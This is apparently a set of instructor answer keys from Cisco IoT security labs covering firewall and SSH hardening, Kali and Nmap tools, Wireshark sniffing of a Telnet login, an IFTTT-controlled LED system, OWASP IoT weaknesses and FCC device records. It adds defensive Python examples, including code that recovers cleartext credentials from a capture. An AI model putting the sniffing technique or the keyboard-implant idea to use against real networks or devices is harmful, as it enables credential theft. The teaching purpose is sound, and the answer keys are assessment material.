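        if key.lower() == "allowusers":
            allow.update(value.split())
        elif key.lower() == "denyusers":
            deny.update(value.split())
    return allow, deny


def ssh_user_permitted(user, config_text):
    """sshd evaluates DenyUsers before AllowUsers; an empty AllowUsers
    list permits everyone, a non-empty one permits only the listed users."""
    allow, deny = parse_sshd_users(config_text)
    if user in deny:
        return False
    return not allow or user in allow


RULE_RE = re.compile(r"^(\S+)(?: \(v6\))?\s+(ALLOW|DENY|REJECT|LIMIT)\s+(.+?)\s*$")


def parse_ufw_status(status_text):
    """Return (active, rules); each rule is (port/proto, action, source, is_v6)."""
    active = "Status: active" in status_text
    rules = []
    for line in status_text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group(1), m.group(2),
                          m.group(3).replace(" (v6)", ""), "(v6)" in line))
    return active, rules


def exposed_ports(status_text):
    """Ports reachable from anywhere (ALLOW or LIMIT); None when UFW is off,
    because then nothing is filtered at all."""
    active, rules = parse_ufw_status(status_text)
    if not active:
        return None
    return sorted({p for p, action, src, _ in rules
                   if action in ("ALLOW", "LIMIT") and src == "Anywhere"})


def audit(user, sshd_text, status_text):
    """List findings: firewall off, more than SSH exposed, user blocked by sshd."""
    active, _ = parse_ufw_status(status_text)
    findings = []
    if not active:
        findings.append("ufw is inactive")
    elif exposed_ports(status_text) != ["22/tcp"]:
        findings.append("ports other than SSH are exposed: %s" % exposed_ports(status_text))
    if not ssh_user_permitted(user, sshd_text):
        findings.append("user %s is blocked by sshd" % user)
    return findings
```

Running audit("kingbob", SSHD_CONFIG, UFW_STATUS) returns an empty list for the configuration the lab builds, while audit("kevin", ...) and audit("pi", ...) report that sshd blocks the user; the pi account is blocked simply because it is not in AllowUsers, which is the point the lab makes about removing the default account.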
Answers may vary but should include that the action listed is “Limit” which is allowing connections that
authenticate successfully within the first 6 attempts in a period of 30 seconds.
c. According to the UFW rules, if a permit HTTPS rule is NOT created, what will happen to HTTPS traffic
that arrives at the IoTpi interface?
____________________________________________________________________________________
____________________________________________________________________________________
Answers should include that any protocol/service that is not specifically permitted will be denied. HTTPS
sessions targeting the Pi will be denied by the UFW.
Part 4: Cleanup
It is very important to harden any IoT gateway device to protect against cybersecurity incidents. However, for
classroom purposes, the Raspberry Pi device should be returned to its original configuration so that other
users can access it as required for other courses.
Reflection
1. What are some common ports and services that may exist on an IoT device and should be locked down that
were not mentioned in this lab?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary but can include port numbers and/or services such as TFTP using TCP port 69, etc.
2. What type of device could be used to recognize an Nmap scan and actively prevent the port scan and host
sweep?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
To actively prevent a scan from retrieving details about a host or network, an IPS device would be used. An
IPS could recognize the number of connection attempts from the threat actor as excessive and
block/quarantine the traffic.
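The detection half of that answer can be demonstrated offline. Below is an added example (not part of the Cisco lab) that reads the "[UFW BLOCK]" lines UFW writes to the system log on the Pi and flags any source that probes many distinct ports within a short window, which is what an IPS signature for a port sweep keys on before it blocks the source. The log lines are constructed in the UFW kernel-log format (an assumption about the exact field layout) using the lab's own addresses; a non-UFW line is included to show it is skipped.

```python
# Port-sweep detection over UFW block log lines. Added example, not the lab's
# code; SAMPLE_LOG is constructed (UFW "[UFW BLOCK]" layout is assumed).
import re
from collections import defaultdict
from datetime import datetime

# Constructed: 203.0.113.1 (the Kali VM) probes six ports in three seconds,
# 203.0.113.5 makes one blocked attempt, and 203.0.113.1 sends one more probe
# half an hour later (outside the detection window).
SAMPLE_LOG = """\
Mar  3 10:00:01 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.1 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=40001 DPT=21 WINDOW=1024 SYN
Mar  3 10:00:01 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.1 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=40002 DPT=23 WINDOW=1024 SYN
Mar  3 10:00:02 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.1 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=40003 DPT=80 WINDOW=1024 SYN
Mar  3 10:00:02 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.1 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=40004 DPT=443 WINDOW=1024 SYN
Mar  3 10:00:03 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.1 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=40005 DPT=8080 WINDOW=1024 SYN
Mar  3 10:00:03 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.1 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=40006 DPT=8443 WINDOW=1024 SYN
Mar  3 10:00:05 IoTpi sshd[812]: Accepted password for kingbob from 203.0.113.1 port 50000 ssh2
Mar  3 10:00:10 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.5 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=41000 DPT=80 WINDOW=1024 SYN
Mar  3 10:30:00 IoTpi kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.1 DST=203.0.113.12 LEN=44 TTL=64 PROTO=TCP SPT=40007 DPT=25 WINDOW=1024 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?\[UFW BLOCK\] .*?SRC=(?P<src>\S+) "
    r".*?PROTO=(?P<proto>\S+) .*?DPT=(?P<dpt>\d+)")


def parse_blocks(log_text):
    """Return [(timestamp, src, proto, dport)] for every UFW block entry."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue                     # not a UFW block line (e.g. sshd)
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year 1900
        events.append((ts, m.group("src"), m.group("proto"), int(m.group("dpt"))))
    return events


def detect_sweeps(events, window_seconds=60, min_ports=5):
    """Sliding window per source: a source that hits at least min_ports
    distinct destination ports within window_seconds is reported, mapped to
    the sorted set of ports seen in the offending window."""
    by_src = defaultdict(list)
    for ts, src, _proto, dpt in events:
        by_src[src].append((ts, dpt))
    alerts = {}
    for src, hits in by_src.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1               # slide the window forward
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[src] = sorted(ports)
    return alerts
```

With the defaults, detect_sweeps(parse_blocks(SAMPLE_LOG)) reports only 203.0.113.1 and only the six ports probed within the first three seconds; the single attempt from 203.0.113.5 and the isolated late probe are below the threshold. An IPS placed in-line would act on the same condition by dropping further packets from that source.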
Lab – Investigate Vulnerability Assessment Tools (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Exploring Kali Linux
Part 2: Investigating Nmap and Zenmap
Part 3: Using Wireshark to Open and Analyze a pcap File
Background / Scenario
Kali Linux is a Debian-based Linux distribution that contains tools for advanced penetration testing and
security auditing. Kali contains several hundred tools which are used for a wide variety of information
technology security tasks. In this lab, you will explore some of the tools available in Kali Linux.
Note: Only use Kali tools on networks on which you are authorized to do so.
Required Resources
PC with at least 1 GB of RAM and 15 GB of free disk space with IoTSec Kali VM
b. Find each of the tools in the table below in the Kali Applications menu. Investigate each and fill in the
table below. You may need to run the tools to determine the type of interface that is used.
Note: Using any of these tools on actual networks could violate the ethical hacking policy for this course
and may break the law.
Nmap
Zenmap
SQLmap
Skipfish
Wireshark
e. Go to the Analyze menu and select Follow > TCP Stream. A window appears that shows the data
exchanged between the client and server. The color coding identifies which host is the source of the data.
If you click any part of the conversation, the corresponding frame will be selected in the capture window.
What is the username and password used for authentication of the session?
____________________________________________________________________________________
____________________________________________________________________________________
fake:user
What operating system is running on the server?
____________________________________________________________________________________
OpenBSD
Which commands were sent from the client to be executed on the server?
____________________________________________________________________________________
____________________________________________________________________________________
ping www.yahoo.com, ls -a
How did the server respond?
____________________________________________________________________________________
____________________________________________________________________________________
The server responded with six ping return messages, ping summary statistics, and a listing of directories.
This packet capture illustrates an important security vulnerability that exists in the Telnet protocol. What is
this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
Telnet sends all data in clear text. The username and password can be read by anyone who could
execute a packet capture on this network segment. In addition, all data that is returned by the server is
also transmitted as clear text. A threat actor could use Wireshark to capture sensitive information in a
Telnet session if access to the network were possible.
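To make the point concrete without the lab's capture file, here is an added example (not part of the Cisco lab) that does in code what Wireshark's Follow > TCP Stream does: it reads a pcap, reassembles each direction of the Telnet conversation in sequence-number order, strips the Telnet option negotiation, and returns the readable text. The capture is constructed in memory; the addresses 192.0.2.10 and 192.0.2.20, the banner and the login fake / user are assumptions chosen to mirror the lab's answers. The result is exactly why the session is readable by anyone positioned on the segment, and why SSH replaces Telnet.

```python
# Follow a Telnet TCP stream from a pcap. Added example, not Cisco's code; the
# pcap is built in memory from SAMPLE_EXCHANGE (constructed data).
import struct
from collections import defaultdict

IAC, SB, SE = 255, 250, 240
CLIENT, SERVER = "192.0.2.10", "192.0.2.20"            # assumed addresses

# Constructed exchange as (direction, bytes): banner with one Telnet option
# (IAC WILL ECHO), then the login and one command.
SAMPLE_EXCHANGE = [
    ("server", b"\xff\xfb\x01OpenBSD/i386 (example) (ttyp0)\r\n\r\nlogin: "),
    ("client", b"fake\r\n"),
    ("server", b"Password:"),
    ("client", b"user\r\n"),
    ("server", b"$ "),
    ("client", b"ls -a\r\n"),
    ("server", b".\t..\t.profile\r\n$ "),
]


def build_frame(src_ip, dst_ip, sport, dport, seq, payload):
    """Ethernet/IPv4/TCP frame; checksums are zero, the parser ignores them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split(".")))) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_session(exchange):
    """Frames for the exchange, tracking TCP sequence numbers per direction."""
    seq, frames = {"client": 1, "server": 1}, []
    for who, payload in exchange:
        src, dst, sp, dp = (CLIENT, SERVER, 51000, 23) if who == "client" else (SERVER, CLIENT, 23, 51000)
        frames.append(build_frame(src, dst, sp, dp, seq[who], payload))
        seq[who] += len(payload)
    return frames


def build_pcap(frames):
    """Little-endian pcap: global header (link type 1 = Ethernet) + records."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", 1_500_000_000 + i, 0, len(f), len(f)) + f)
    return b"".join(out)


def tcp_segments(pcap_bytes):
    """Yield (src, sport, dst, dport, seq, payload) for every TCP segment."""
    if struct.unpack_from("<I", pcap_bytes)[0] != 0xA1B2C3D4:
        raise ValueError("only little-endian pcap is handled here")
    pos = 24
    while pos + 16 <= len(pcap_bytes):
        incl_len = struct.unpack_from("<IIII", pcap_bytes, pos)[2]
        frame, pos = pcap_bytes[pos + 16:pos + 16 + incl_len], pos + 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                    # not IPv4 carrying TCP
        ip = frame[14:]
        ihl, total = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total]
        sport, dport, seq = struct.unpack_from("!HHI", tcp)
        yield (".".join(map(str, ip[12:16])), sport, ".".join(map(str, ip[16:20])),
               dport, seq, tcp[(tcp[12] >> 4) * 4:])


def follow_tcp_stream(pcap_bytes, client, server):
    """Join payloads in sequence order, one buffer per direction, so a capture
    with out-of-order frames still reassembles correctly."""
    buffers = defaultdict(list)
    for src, sport, dst, dport, seq, payload in tcp_segments(pcap_bytes):
        if (src, dst) == (client, server):
            buffers["client"].append((seq, payload))
        elif (src, dst) == (server, client):
            buffers["server"].append((seq, payload))
    return {d: b"".join(p for _, p in sorted(s)) for d, s in buffers.items()}


def strip_telnet_iac(data):
    """Drop Telnet option negotiation so only the exchanged text remains."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i]); i += 1
        elif data[i + 1:i + 2] == b"\xff":
            out.append(IAC); i += 2                     # escaped 0xff data byte
        elif data[i + 1:i + 2] == bytes([SB]):
            end = data.find(bytes([IAC, SE]), i + 2)    # skip subnegotiation
            i = len(data) if end < 0 else end + 2
        elif i + 1 < len(data) and 251 <= data[i + 1] <= 254:
            i += 3                                      # WILL/WONT/DO/DONT <opt>
        else:
            i += 2                                      # other two-byte command
    return bytes(out)


def session_text(frames):
    """What an observer on the segment can read, per direction, as text."""
    stream = follow_tcp_stream(build_pcap(frames), CLIENT, SERVER)
    return {d: strip_telnet_iac(b).decode("ascii", "replace") for d, b in stream.items()}
```

session_text(build_session(SAMPLE_EXCHANGE)) returns the client side as the literal keystrokes "fake", "user" and "ls -a", and the server side as the banner, prompts and directory listing; feeding the same frames in reverse order gives the identical result because reassembly sorts by sequence number rather than capture order.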
Lab – Create an IoT Sensor-Actuator System (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.
Connectivity requirements: As shown in the topology, the Raspberry Pi must be able to reach the Internet
and must also be reachable from a student computer via the network so that code can be completed in a
Jupyter Notebook.
Addressing
No specific addressing is required as long as the communications requirements are met.
Objectives
• Build a simple electronic circuit that is under control of the Raspberry Pi.
• Create a simple control app using IFTTT and dweet.io.
• Configure an IFTTT app as a widget in Android or iOS.
• Complete Python code that will control an end-to-end IoT system.
• Use a smartphone to trigger actions of Raspberry Pi through IFTTT.
• Describe possible security vulnerabilities of such an IoT system.
Background / Scenario
IoT systems often consist not only of sensor and actuator electronics, but also of software applications that
control the systems through a cloud platform. In home automation systems, sensors and actuators in the
home connect to the local network over Wi-Fi and a cloud management platform through the Internet. The
cloud management platform collects data from the IoT system and enables control of it from either a browser
or specialized app that runs on a mobile device.
When evaluating system security, it is useful to break the system down into parts in order to identify different
areas of potential vulnerability.
In this lab, you will build a simple circuit that is controlled by the Raspberry Pi. Then, through the integration of
two web services, you will create a simple app that can control the circuit from a mobile device, either over a
cellular or Wi-Fi connection. To complete this lab, you will use your circuit building and Python skills from the
IoT Connecting Things course. Finally, you will analyze the system to identify potential vulnerabilities at the
device, communication, and application layers of the simplified IoT model.
Required Resources
• PC or laptop
• Raspberry Pi 3, Model B or B+, with PL-App
• Breadboard
• Two 330 Ohm resistors
• Two LEDs, one red and one green
• Jumper wires
• IFTTT account
• Smart phone with recent operating system (Requires iOS 9.0 or higher, or Android devices running 4.1 or
higher.)
• IFTTT app for Android or iOS
• Incoming Internet access to the Raspberry Pi over HTTPS (port 443)
• Network connectivity between host and Raspberry Pi
Use the schematic to make the connection from the circuit to the Raspberry Pi.
Schematic:
Pinouts:
# Import the GPIO modules to control the GPIO pins of the Raspberry Pi
import RPi.GPIO as GPIO
# Import the time module to control the timing of your application (e.g. add
# a delay, etc.)
import time
b. Setup the Raspberry Pi hardware. Add values for the pin numbers for the GreenLEDPin and RedLEDPin
variables. Get the values you need from the circuit connections.
In this code cell, and several others below, students are required to add values to the code. The areas
where values are required are indicated by comments that say "Add values." In addition, the areas of
code requiring completion are indicated with lines of equal signs: ===================.
# Code Cell 2.
#Setup hardware
# Set the desired pin numbering scheme:
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
#Create variables for the GPIO PINs the LEDs are connected to
# ============================================
# the PIN of the green LED
GreenLEDPin = 20 #Add values: add the pin number for the green LED
# the PIN of the red LED
RedLEDPin = 21 #Add values: add the pin number for the red LED
#=============================================
What did you change in the code to change the time that the LEDs were lit in each cycle?
____________________________________________________________________________________
In code cell 3, the values in one or both of the time.sleep() methods.
If the circuit were attached to different pins on the Pi, what in the code would need to be changed?
____________________________________________________________________________________
In Code Cell 2, the values assigned to the GreenLEDPin and RedLEDPin variables.
d. In the Search services field, enter button and then click the Button widget tile that appears.
e. Click Connect. On the Choose trigger page, click the Button widget tile.
f. Click the blue +that text to select the action that will be triggered by the Button widget.
g. Type webhooks into the search services field and click the Webhooks tile to select this service as the
action that will be triggered.
h. We now need to enter the URL of the dweet thing that will receive a message sent by the Button
widget. First, we need to create a name for our thing. The name should be unique in order to make sure
that only messages posted by you will be received by the thing. The name of the thing can contain no
spaces but can be hyphenated. Keep the name of your thing private. There is no account-based security
on dweet.io. We did not even need to register!
Click in the URL field of the Make a web request interface. Enter the following URL, substituting the
name of your thing where indicated. Do not include the {} characters in the URL.
https://dweet.io/dweet/for/{my-thing-name}?text=mydweet
Students will benefit from exploring the dweet.io functionality and API. There is interactive documentation
that allows students to explore various dweet.io functionalities and API concepts. For the sake of brevity,
this material is not covered in this lab.
i. Click Create action to create and Finish to save your app. Your completed applet should look like this:
That is it! This is all that you need to do to create the IFTTT app. The other fields on this screen can be left
unchanged.
#===================
myThing = "your_thing_name" #Add value: add your dweet thing name
#===================
print(old_created)
Part 5: Use the IFTTT app on the smartphone to trigger an event on the
Raspberry Pi
Make sure the smart phone has Internet connectivity, either by Wi-Fi or cellular data. Using cellular data will
prove that the circuit can be controlled from anywhere that has cellular data coverage.
a. Run the code cells. It is not necessary to run Code Cell 3 unless you need to verify that the circuit still
works and can be controlled from the Pi.
b. When prompted, initialize an LED when the code cell is run by selecting the color that should be lit.
c. After running the last code cell, the Raspberry Pi will be continuously monitoring the dweet.io thing in
order to detect a new button push. On your smart phone, tap the IFTTT button widget. After a brief delay,
the LED that is illuminated will change. Try this several times and observe the circuit.
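The monitoring loop in step c compares the "created" timestamp of the latest dweet with the one it saw last (the old_created variable printed in Part 4) and only toggles the LED when a newer dweet appears. Here is an added example (not the lab's own code cell) of that logic with the GPIO toggle replaced by a callback and the HTTP call injected, so it can be exercised offline with constructed responses. It assumes the dweet.io "get latest" endpoint https://dweet.io/get/latest/dweet/for/{thing} returns JSON of the shape {"this": "succeeded", "with": [{"created": ..., "content": {...}}]}; the sample responses below are constructed. Because dweet.io has no authentication, the watcher also checks that the payload is the text the IFTTT applet sends, which is the one validation available with an open, name-only channel.

```python
# Poll a dweet.io thing and act once per new button push. Added example, not
# Cisco's cell; the response format is an assumption and SAMPLE_POLLS is
# constructed data.
import json
import time
import urllib.request

DWEET_LATEST = "https://dweet.io/get/latest/dweet/for/{thing}"


def fetch_latest(thing):
    """Real fetch over HTTPS (the offline simulation never calls this)."""
    with urllib.request.urlopen(DWEET_LATEST.format(thing=thing), timeout=10) as r:
        return json.loads(r.read().decode())


def latest_dweet(response):
    """Return (created, content) or None if the thing has no dweet / lookup failed."""
    if response.get("this") != "succeeded" or not response.get("with"):
        return None
    d = response["with"][0]
    return d["created"], d.get("content", {})


class ButtonWatcher:
    """Keeps the last seen 'created' timestamp (the lab's old_created) and
    fires on_press once per new dweet whose content matches our applet."""

    def __init__(self, expected_text="mydweet", on_press=None):
        self.expected_text = expected_text
        self.on_press = on_press or (lambda: None)
        self.old_created = None
        self.presses = 0
        self.rejected = 0

    def handle(self, response):
        """Process one poll; True when a new, valid button push was acted on."""
        latest = latest_dweet(response)
        if latest is None:
            return False
        created, content = latest
        if self.old_created is None:
            self.old_created = created   # baseline: ignore dweets from before start
            return False
        if created == self.old_created:
            return False                 # nothing new since the last poll
        self.old_created = created
        if content.get("text") != self.expected_text:
            self.rejected += 1           # posted by something other than our applet
            return False
        self.presses += 1
        self.on_press()
        return True

    def run(self, thing, interval=1.0, fetch=fetch_latest, polls=None):
        """Poll loop; `polls` bounds the number of iterations (None = forever)."""
        n = 0
        while polls is None or n < polls:
            self.handle(fetch(thing))
            n += 1
            time.sleep(interval)


def _response(created, text):
    """Constructed dweet.io-style success response."""
    return {"this": "succeeded", "by": "getting", "the": "dweets",
            "with": [{"thing": "example-thing", "created": created, "content": {"text": text}}]}


# Constructed sequence of poll results, oldest first.
SAMPLE_POLLS = [
    _response("2019-03-01T10:00:00.000Z", "mydweet"),         # present at start
    _response("2019-03-01T10:00:00.000Z", "mydweet"),         # unchanged
    _response("2019-03-01T10:00:07.000Z", "mydweet"),         # button pressed
    _response("2019-03-01T10:00:09.000Z", "not-our-applet"),  # foreign post
    {"this": "failed", "with": 404, "because": "we couldn't find this"},
    _response("2019-03-01T10:00:15.000Z", "mydweet"),         # second press
]


def simulate(polls=SAMPLE_POLLS):
    """Run the watcher over canned polls; returns (per-poll results, presses,
    rejected, final old_created)."""
    toggles = []
    w = ButtonWatcher(on_press=lambda: toggles.append("toggle"))
    results = [w.handle(p) for p in polls]
    return results, w.presses, w.rejected, w.old_created
```

simulate() shows the two legitimate presses being acted on, the foreign post being counted as rejected rather than toggling the LED, and the failed lookup being ignored without disturbing old_created. For the real circuit, pass a function that drives the GPIO pins as on_press and call run(myThing) with the default fetch.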
Congratulations! You have created your own end-to-end IoT system.
Reflection
1. This system is not terribly exciting but can serve as a model for much more interesting IoT systems. Choose
an IoT sector and imagine a device that could be actuated by a system like this (instead of, or in addition to,
the LEDs). What are the security implications if a hacker was able to take control of the system?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. This system could serve as a metaphor, most obviously, of a home automation application
that interacts with a home IoT device such as a light switch or other device that can be turned on or off. With a
little additional imagination, the system could be seen as a wirelessly controlled medical device, power grid
switchgear, or even the flood gates on a dam.
2. Create a diagram of the system or use the one above. Label each element of the diagram with the layer of the
simplified IoT model that it belongs to.
3. What elements of this system make up its attack surface? List all the elements which are potentially
vulnerable to a cyberattack. What kinds of attacks are possible? Answer in the table below or create your own
table. Think of the system in terms of the roles of its elements. Rather than "Raspberry Pi", for example, think of
"Controller (Raspberry Pi)".
Lab – Investigating IoT Security Requirements (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will learn about IoT security requirements by investigating OWASP critical IoT security
vulnerabilities.
• Investigate OWASP.
• Investigate the OWASP IoT Top 10 Vulnerabilities.
• Investigate Vulnerabilities, Vulnerability Assessment, and Mitigation Measures.
Background / Scenario
In this lab, you will review a list of the top 10 IoT security vulnerabilities as documented by the Open Web
Application Security Project (OWASP). These vulnerabilities are generic weaknesses in IoT devices,
communications, or applications that can be exploited by threat actors. The vulnerabilities are directly related
to the IoT security requirements.
Instructor Note: The purpose of this lab is for students to begin thinking about how the critical security
requirements for IoT systems relate to specific vulnerabilities. The OWASP Internet of Things Project is a
valuable resource for learning about IoT security. Although some things discussed in it are beyond the scope
of this course, familiarity with the OWASP resources will help students continue in their learning about the IoT
security topic.
Required Resources
• PC with Internet access
____________________________________________________________________________________
____________________________________________________________________________________
OWASP offers guidelines for medical and manufacturing (ICS/SCADA) IoT use cases.
Look at the IoT Event Logging Project tab. Give three examples of the security events that OWASP
recommends should be logged.
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. Students will not understand all of this, however, they should pick out a few things that
make sense to them, such as high rate of password attempts, traffic from unenrolled systems, device
case tampering, and device entered administrative mode. Encourage students to research and discuss
events that are new to them.
Default passwords and usernames are required to be changed after initial setup. Password recovery
mechanisms do not verify to an attacker that a username is valid. For example, an attacker can enter a
random username at the interface and click "Forgot Password." The web frontend should require entry of
additional information, such as an email address as part of the recovery process. If the email address is
unknown to the system, then an error message is posted and the process will not continue. In addition,
passwords should be strong, account lock out should be implemented, and no passwords should be
transmitted in clear text.
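The recovery behaviour described above is easy to get wrong in code, so here is an added example (not from the lab or from OWASP) showing the two variants side by side: a recovery handler whose response differs for unknown usernames (the enumeration oracle), and a hardened one that requires the registered e-mail address and returns the same message either way, plus a login with lockout after repeated failures and salted password hashing. The in-memory account store and the account details are constructed.

```python
# Username-enumeration-safe password recovery with lockout. Added example, not
# the lab's code; the AccountStore and its sample account are constructed.
import hashlib
import hmac
import os
import secrets

GENERIC_MSG = ("If an account with that username and e-mail address exists, "
               "recovery instructions have been sent.")
MAX_FAILURES = 5
PBKDF2_ROUNDS = 100_000


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class AccountStore:
    def __init__(self):
        self.users = {}        # username -> {"email", "salt", "hash", "failures"}
        self.sent_mail = []    # (email, token) pairs a real system would e-mail

    def add_user(self, username, email, password):
        salt = os.urandom(16)
        self.users[username] = {"email": email, "salt": salt,
                                "hash": _hash(password, salt), "failures": 0}

    # Vulnerable: the response tells the caller whether the username exists.
    def recover_vulnerable(self, username):
        if username not in self.users:
            return "Error: no such user"              # enumeration oracle
        email = self.users[username]["email"]
        self._send(email)
        return "Recovery e-mail sent to " + email     # also leaks the address

    # Hardened: same message whether or not the user exists, and recovery
    # proceeds only when the supplied e-mail matches the registered one.
    def recover_hardened(self, username, email):
        user = self.users.get(username)
        if user is not None and hmac.compare_digest(
                user["email"].lower().encode(), email.lower().encode()):
            self._send(email)
        return GENERIC_MSG

    def login(self, username, password):
        """'ok', 'denied' or 'locked'; the counter resets on success."""
        user = self.users.get(username)
        if user is None:
            return "denied"                            # same answer as a bad password
        if user["failures"] >= MAX_FAILURES:
            return "locked"
        if hmac.compare_digest(_hash(password, user["salt"]), user["hash"]):
            user["failures"] = 0
            return "ok"
        user["failures"] += 1
        return "denied"

    def _send(self, email):
        self.sent_mail.append((email, secrets.token_urlsafe(16)))
```

With one registered account, recover_vulnerable("nobody") and recover_vulnerable("admin") return visibly different strings, while recover_hardened returns GENERIC_MSG for an unknown user, for a known user with the wrong e-mail, and for the correct pair; only the last of those actually queues a message. After MAX_FAILURES wrong passwords the account answers "locked" even to the correct password, which is the lockout the paragraph asks for.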
Vulnerability    Assessment    Mitigation
Lab – Investigate the FCC Database (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Use the Federal Communications Commission (FCC) database to view information about various IoT devices
that utilize radio frequencies for data transmission. The database has information that could benefit both the
user and a potential attacker.
Part 1: Search for Information by FCC ID
Part 2: Search for Information using the Advanced Search
Background / Scenario
IoT devices often use wireless technologies to communicate with various equipment including other IoT
devices. The FCC requires companies that develop devices that use any form of radio frequency for
transmission to register those devices and provide supporting information about the particular device. Tests
must be performed to make certain that the devices conform to the rules established by the FCC. The FCC
requires that device manufacturers visibly display their FCC ID on the device.
Required Resources
PC or mobile device with Internet access
b. The search fields include a grantee code and a product code. The grantee code is either a 3-character or
5-character code stamped on the device. The example used here has the ID printed on the label as FCC
ID: JNZYR0019. Because the ID provided does not specify how the number is separated, attempt to put
the first 3 characters in the Grantee Code text box and the remaining characters in the Product Code
text box. Click the Search button. How many entries were displayed?
____________________________________________________________________________________
There is one entry displayed at the time this lab was written.
What is the Applicant Name that is displayed?
____________________________________________________________________________________
Logitech Far East Ltd
What other columns of information are available?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
View Form, Display Exhibits, Display Grant, Display Correspondence, Applicant Name, Address, City,
State, Country, Zip Code, FCC ID, Application Purpose, Final Action Date, Lower Frequency in MHz,
Upper Frequency in MHz.
c. Click the Summary link under the Display Exhibits column. Which Exhibit Types are marked as
Permanent Confidential?
____________________________________________________________________________________
Block Diagram, Operational Description, Schematics
d. Click the back button in your browser. Click the Detail link under the Display Exhibits column. A warning
message displays informing you that the FCC does not guarantee the documents to be virus-free. If you
have a current anti-virus application in place and have reason to trust the entity, click OK to accept the
warning. What Exhibit Types are available?
____________________________________________________________________________________
____________________________________________________________________________________
Cover Letters, External Photos, ID/Location Info, Internal Photos, Test Report, Test Setup Photos, Users
Manual
e. Click the Test Report attachment. Scroll down to page 6 to display the General Information. What is the
Product that is displayed?
____________________________________________________________________________________
2.4GHz Cordless Keyboard
What information is displayed about the Antenna Type?
____________________________________________________________________________________
PCB printed antenna with 1.41dBi antenna gain
f. Scroll to the next page. How many channels are listed in the table? ______________________________
Channels 1-12
What is the frequency range? What technologies use this frequency range?
____________________________________________________________________________________
2405-2474 MHz. Bluetooth and WiFi both use this range. This range is part of the Industrial, Scientific and
Medical (ISM) radio bands.
g. Close the Test Report attachment. Click the Internal Photos document. Scroll through the document. What
kind of photos are displayed?
____________________________________________________________________________________
A breakdown of the parts and components in the keyboard.
Is there a potential for an attack with this device? Please explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Given that the keyboard uses Bluetooth, it could be possible for an attacker to capture transmitted data. It
would also be possible for an attacker to modify the keyboard in some fashion to capture what is being typed
without the user's knowledge. This could possibly be achieved by implanting some kind of recording
device that makes use of the SPI_MOSI and SPI_MISO pins inside the keyboard. This keyboard could be
used on many types of IoT devices.
Reflection
1. How could the information available in the FCC database be valuable when attempting to secure IoT devices?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The primary areas to note would be the potential schematics and communication protocols.
2. How could the information available in the FCC database be valuable to an IoT attacker?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. Using the same information, we are attempting to secure areas that attackers are trying to
exploit.
Lab - Compromise IoT Device Hardware (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Perform threat modeling activities to evaluate IoT device hardware and firmware.
Part 1: Accessing the Raspberry Pi with Serial Interface
Part 2: Disabling Serial Login Access to Raspberry Pi
Background / Scenario
This lab will demonstrate how an IoT device may be compromised by physically connecting to the device
using communication protocols other than Ethernet. A Raspberry Pi could be used for controlling and
